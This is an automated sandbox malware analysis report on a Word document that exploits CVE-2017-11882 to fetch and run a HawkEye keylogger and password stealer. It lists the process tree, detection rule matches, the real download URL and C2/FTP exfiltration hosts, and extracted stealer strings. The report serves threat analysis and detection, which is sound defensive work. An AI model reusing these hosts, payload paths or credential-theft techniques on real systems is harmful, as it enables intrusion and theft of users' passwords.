
Windows Analysis Report 280072109764552.doc

Overview

General Information

Sample Name:280072109764552.doc
Analysis ID:455555
MD5:ae01f0cc63c8a3b7bb239976c56788c3
SHA1:cd86bb62ab645cab4d20ec8a931ca9e84801ea36
SHA256:fde845dc869db03ce766a34d4d325cfb60ea5e605244e823fcfea5b3135aacb7
Tags:doc

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sample uses process hollowing technique
Searches for Windows Mail specific files
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2700 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2376 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • name.exe (PID: 1776 cmdline: 'C:\Users\user\AppData\Roaming\name.exe' MD5: FA0A3ED04EEC65D6D3FB55AA7D2497C1)
      • InstallUtil.exe (PID: 2964 cmdline: C:\Users\user\AppData\Local\Temp\InstallUtil.exe MD5: BB85AA6D90A4157ED799257072B265FF)
        • vbc.exe (PID: 944 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: 1672D0478049ABDAF0197BE64A7F867F)
        • vbc.exe (PID: 2460 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: 1672D0478049ABDAF0197BE64A7F867F)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Yara Overview

Memory Dumps

Source: 00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmp | Rule: HKTL_NET_GUID_Stealer | Description: Detects c# red/black-team tools via typelibguid | Author: Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
Source: 00000005.00000002.2363914554.00000000005E0000.00000004.00000001.sdmp | Rule: HKTL_NET_GUID_Stealer | Description: Detects c# red/black-team tools via typelibguid | Author: Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
Source: 00000007.00000002.2179402637.0000000000400000.00000040.00000001.sdmp | Rule: JoeSecurity_WebBrowserPassView | Description: Yara detected WebBrowserPassView password recovery tool | Author: Joe Security
Source: 00000006.00000002.2176599122.0000000000400000.00000040.00000001.sdmp | Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security
Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp | Rule: RAT_HawkEye | Description: Detects HawkEye RAT | Author: Kevin Breen <kevin@techanarchy.net>
  • 0x7b697:$key: HawkEyeKeylogger
  • 0x7d895:$salt: 099u787978786
  • 0x7bcb0:$string1: HawkEye_Keylogger
  • 0x7cb03:$string1: HawkEye_Keylogger
  • 0x7d7f5:$string1: HawkEye_Keylogger
  • 0x7c099:$string2: holdermail.txt
  • 0x7c0b9:$string2: holdermail.txt
  • 0x7bfdb:$string3: wallet.dat
  • 0x7bff3:$string3: wallet.dat
  • 0x7c009:$string3: wallet.dat
  • 0x7d3d7:$string4: Keylog Records
  • 0x7d6ef:$string4: Keylog Records
  • 0x7d8ed:$string5: do not script -->
  • 0x7b67f:$string6: \pidloc.txt
  • 0x7b6e5:$string7: BSPLIT
  • 0x7b6f5:$string7: BSPLIT
28 entries in total; the remaining entries are not shown.

Unpacked PEs

Source: 5.2.InstallUtil.exe.5e0000.5.raw.unpack | Rule: HKTL_NET_GUID_Stealer | Description: Detects c# red/black-team tools via typelibguid | Author: Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
Source: 5.2.InstallUtil.exe.36594d0.12.unpack | Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security
Source: 4.2.name.exe.368a90f.10.unpack | Rule: JoeSecurity_WebBrowserPassView | Description: Yara detected WebBrowserPassView password recovery tool | Author: Joe Security
Source: 5.2.InstallUtil.exe.36716f0.11.raw.unpack | Rule: JoeSecurity_WebBrowserPassView | Description: Yara detected WebBrowserPassView password recovery tool | Author: Joe Security
Source: 4.2.name.exe.349032a.9.raw.unpack | Rule: RAT_HawkEye | Description: Detects HawkEye RAT | Author: Kevin Breen <kevin@techanarchy.net>
  • 0x7548f:$key: HawkEyeKeylogger
  • 0x7768d:$salt: 099u787978786
  • 0x75aa8:$string1: HawkEye_Keylogger
  • 0x768fb:$string1: HawkEye_Keylogger
  • 0x775ed:$string1: HawkEye_Keylogger
  • 0x75e91:$string2: holdermail.txt
  • 0x75eb1:$string2: holdermail.txt
  • 0x75dd3:$string3: wallet.dat
  • 0x75deb:$string3: wallet.dat
  • 0x75e01:$string3: wallet.dat
  • 0x771cf:$string4: Keylog Records
  • 0x774e7:$string4: Keylog Records
  • 0x776e5:$string5: do not script -->
  • 0x75477:$string6: \pidloc.txt
  • 0x754dd:$string7: BSPLIT
  • 0x754ed:$string7: BSPLIT
83 entries in total; the remaining entries are not shown.

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.255.237.180, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2376, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2376, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\user\AppData\Roaming\name.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\name.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\name.exe, NewProcessName: C:\Users\user\AppData\Roaming\name.exe, OriginalFileName: C:\Users\user\AppData\Roaming\name.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2376, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\name.exe' , ProcessId: 1776
Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\name.exe' , ParentImage: C:\Users\user\AppData\Roaming\name.exe, ParentProcessId: 1776, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ProcessId: 2964

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 280072109764552.doc | Avira: detected
Found malware configuration
Source: name.exe.1776.4.memstr | Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe | ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\name.exe | ReversingLabs: Detection: 13%
Multi AV Scanner detection for submitted file
Source: 280072109764552.doc | ReversingLabs: Detection: 31%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\name.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe | Joe Sandbox ML: detected
Source: 5.2.InstallUtil.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 5.2.InstallUtil.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 4.2.name.exe.3682b02.11.unpack | Avira: Label: TR/Inject.vcoldi
Source: 4.2.name.exe.3489f22.7.unpack | Avira: Label: TR/Inject.vcoldi

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\name.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 192.168.2.22:49168 -> 142.250.203.100:443 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb | source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmp
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb | source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb | source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: InstallUtil.pdb | source: name.exe, 00000004.00000002.2153168728.0000000006870000.00000004.00000001.sdmp, InstallUtil.exe
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp | Binary or memory string: autorun.inf
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp | Binary or memory string: [autorun]
Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp | Binary or memory string: autorun.inf
Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp | Binary or memory string: [autorun]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4x nop then jmp 00349438h
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h]
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 4x nop then call 001A2300h
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 4x nop then jmp 001A2248h
Source: global traffic | DNS query: name: vecvietnam.com.vn
Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 142.250.203.100:443
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 103.255.237.180:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.22:49171 -> 45.141.152.18:21
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.141.152.18:64943
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: Apache | Date: Wed, 28 Jul 2021 15:01:16 GMT | Content-Type: application/octet-stream | Content-Length: 1383936 | Last-Modified: Wed, 28 Jul 2021 00:30:49 GMT | Connection: keep-alive | ETag: "6100a539-151e00" | Expires: Fri, 27 Aug 2021 15:01:16 GMT | Cache-Control: max-age=2592000 | Accept-Ranges: bytes
Source: Joe Sandbox View | IP Address: 45.141.152.18
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View | ASN Name: M247GB
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: unknown | FTP traffic detected: 45.141.152.18:21 -> 192.168.2.22:49171 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- | 220-You are user number 1 of 50 allowed. | 220-Local time is now 11:02. Server port: 21. | 220-This is a private system - No anonymous login | 220-IPv6 connections are also welcome on this server. | 220 You will be disconnected after 15 minutes of inactivity.
Source: global traffic | HTTP traffic detected: GET /xpen3/09867654270721.PDF.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: vecvietnam.com.vn | Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{238E66D8-299E-4B99-A605-44EE5B79BCDD}.tmp
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp | String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp | String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: vecvietnam.com.vn
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: name.exe, 00000004.00000002.2141473000.0000000000A7C000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmp | String found in binary or memory: http://ftp.vngpack.com
Source: name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp | String found in binary or memory: http://n.f
Source: name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp, name.exe, 00000004.00000002.2150294891.0000000005113000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.c/s
Source: name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobede
Source: name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp | String found in binary or memory: http://ns.ao
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: name.exe, 00000004.00000002.2141909608.0000000002481000.00000004.00000001.sdmp | String found in binary or memory: http://schema.org/WebPage
Source: name.exe, 00000004.00000002.2150758062.0000000005CA0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: http://whatismyipaddress.com/-
Source: name.exe, 00000004.00000002.2150758062.0000000005CA0000.00000002.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2374162693.00000000081A0000.00000002.00000001.sdmp, vbc.exe, 00000007.00000002.2180304316.00000000028B0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe | String found in binary or memory: http://www.nirsoft.net/
Source: InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp | String found in binary or memory: http://www.site.com/logs.php
Source: vbc.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp | String found in binary or memory: https://pki.goog/repository/0
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com
            Source: name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
            Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected HawkEye Keylogger
            Source: Yara match | File source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
            Contains functionality to log keystrokes (.Net Source)
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs | .Net Code: HookKeyboard
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
            Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
